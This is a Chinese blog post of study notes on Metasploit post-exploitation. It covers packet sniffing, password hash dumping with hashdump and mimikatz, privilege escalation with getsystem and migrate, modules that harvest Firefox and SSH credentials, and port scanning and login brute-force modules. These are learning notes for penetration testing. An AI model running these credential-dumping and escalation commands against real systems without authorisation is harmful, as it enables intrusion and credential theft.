使用msf模块::提权&信息收集|内网渗透学习(三)

使用msf模块::提权&信息收集|内网渗透学习(三)

时间线

内网渗透学习(一) 2022.9.23

内网渗透学习(二) 2022.9.23

ByteCT 2022.9.24

MTCTF-Final 2022.9.25

内网渗透学习(三) 2022.9.26

数据包抓取

执行下面命令通过加载sniffer进行流量包住抓取

load sniffer
sniffer_interfaces
sniffer_start 1
sniffer_dump 1 1.cap

image-20220926224523260

使用auxiliary/sniffer/psnuffle模块对抓取的流量包数据就行解密

use auxiliary/sniffer/psnuffle
set PCAPFILE 1.cap
run

image-20220926224923762

口令破解

注意执行hashdump模块进行哈希读取需要system/administrator权限, 否则会报错

use post/windows/gather/hashdump
set session 
exploite

use post/windows/gather/smart_hashdump
set session 
exploite

system/administrator用户:

image-20220926230351845

administrator用户:

image-20220926230309339

提权

这里学到的提权主要有两种方式, 一个是直接使用getsystem进行提权, 另一个是使用migrate将当前进程迁移到一个system权限的进程下完成system的提权

  1. 使用getsystem进行提权需要注意的一点是这个方式进行的提权有时候可能拿到的是一个假的system权限, 就是说虽然使用getuid或者sessions都显示当前会话拥有的是system权限,但是实际上并不能做system权限才能做的事情

    image-20220927001702423

  2. 使用migrate的话就是有两步:

    1. 执行tasklist /V找到一个system权限的进程, 然后记录下它的进程pid
    2. 执行migrate pid

    先就是migrate提权的演示过程

高级一点的口令破解(migrate提权)

如果当前非system, 我们可以通过导出一个system用户的进程

getpid #输出当前shell的pid
getuid
migrate systempid
hashdump

image-20220926233827315

image-20220926233844741

哈希格式:

用户名:用户id:LM-HASH:NTHASH

系统自带用户的用户一般都是500多,我们自己创建的用户id则是1000往上

mimakatz

上面的hashdump只是mimikatz的部分功能而已

load mimikatz
wdigest kerberos msv ssp tspkg tspkg livessp
mimikatz_command -h
mimikatz_command -f a:: #查询有哪些模块
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey

其他的学习收集模块

是否为虚拟机

run checkvm

获取目标主机上的软件安装信息:

run post/windows/gather/enum_applications

获取主机上最近访问过得文档,链接信息:

run post/windows/gather/dumplinks

查看环境信息:

run post/multi/gather/env

查看firefox中存储的账号密码:

run post/multi/gather/firefox_creds

查看ssh账号密码的密文,证书信息:

run post/multi/gather/ssh_creds

综合性比较强建议使用的模块(scraper和winenum)

run scraper
run winenum

image-20220926234503446

更多其他的信息收集模块可以通过搜索search gather,一共大概有三百多个

image-20220926233954025

主机发现

msf主机发现的全部代码模块都位于modules/auxiliary/scanner/discovery/

主要有下面几个:

modules/auxiliary/scanner/discovery/arp_sweep
modules/auxiliary/scanner/discovery/ipv6_mulitcast_ping
modules/auxiliary/scanner/discovery/ipv6_neighbor
modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
modules/auxiliary/scanner/discovery/udp_probe
modules/auxiliary/scanner/discovery/udp_sweep

端口扫描

端口扫描在msf中的关键字是portscan,可以执行命令搜索看有哪些模块

search portscan

image-20220926235200423

主要用的比较多的扫描有以下几种:

auxiliary/scanner/portscan/ftpbounce //通过FTP bounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能很好防范此攻击,单在旧的系统上仍可以被利用
auxiliary/scanner/natpmp/natpmp_portscan //NAT-PMP External Port Scanner
auxiliary/scanner/portscan/xmas //圣诞树扫描.属于较为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级TCP标记检测器的过滤
auxiliary/scanner/portscan/ack //通过ACK扫描方式对防火墙上未被屏蔽的断口进行探测
auxiliary/scanner/portscan/tcp //通过一次完整TCP连接来判断端口是否开放,速度较慢
auxiliary/scanner/portscan/syn //使用发送TCP SYN标志方式探测开放端口

image-20220927000630235

服务扫描查点

在找到开放的端口之后, 则是对端口开放的服务进行进一步的探测挖掘

在msf中对服务的扫描探测模块都是放在scanner辅助模块中, 服务扫描查点的模块经常通过下面两种方式命名

[service_name]_version //用于便利网络中包含了某种服务的主机,并且进一步的确定服务的版本号
[service_name]_login //对某种服务进行口令探测攻击(爆破)

想要查找模块的话可以直接搜服务的名字,也可以搜_version或者_login

image-20220927000753351

搜索后可以发现探测服务版本的_version模块有34个, 而_login口令探测攻击的模块则有117个

利用方式的话就是直接use指定之后show options查看选项设置对应的参数即可,这里就不展开详细展示了.

第一节结束, 收工收工, 明天还要上密码学, 今日早睡

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇